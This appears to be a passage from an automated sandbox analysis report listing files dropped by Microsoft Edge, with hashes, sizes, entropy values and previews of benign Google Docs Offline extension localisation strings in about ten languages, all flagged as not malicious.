                                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
